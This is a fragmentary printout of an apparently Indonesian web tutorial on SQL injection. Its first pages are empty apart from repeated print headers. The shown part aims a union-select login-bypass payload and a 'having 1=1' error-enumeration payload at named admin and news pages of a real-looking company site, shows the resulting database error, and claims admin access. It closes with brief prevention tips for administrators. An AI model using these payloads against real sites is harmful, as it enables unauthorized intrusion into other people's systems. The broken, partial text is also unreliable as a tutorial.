SQL Injection, Step by Step
SQL Injection, Step by Step
/*********************************************************
* SQL Injection, step by step.
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/
1 of 6 09/01/2011 3:23
SQL Injection, step by step http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articl...
2 of 6 09/01/2011 3:23
SQL Injection, step by step http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articl...
3 of 6 09/01/2011 3:23
SQL Injection, step by step http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articl...
Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba
Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!
4 of 6 09/01/2011 3:23
SQL Injection, step by step http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articl...
Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.
******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
5 of 6 09/01/2011 3:23
SQL Injection, step by step http://www.sekuritionline.net/plugins/p2_news/printarticle.php?p2_articl...
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.
Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)
6 of 6 09/01/2011 3:23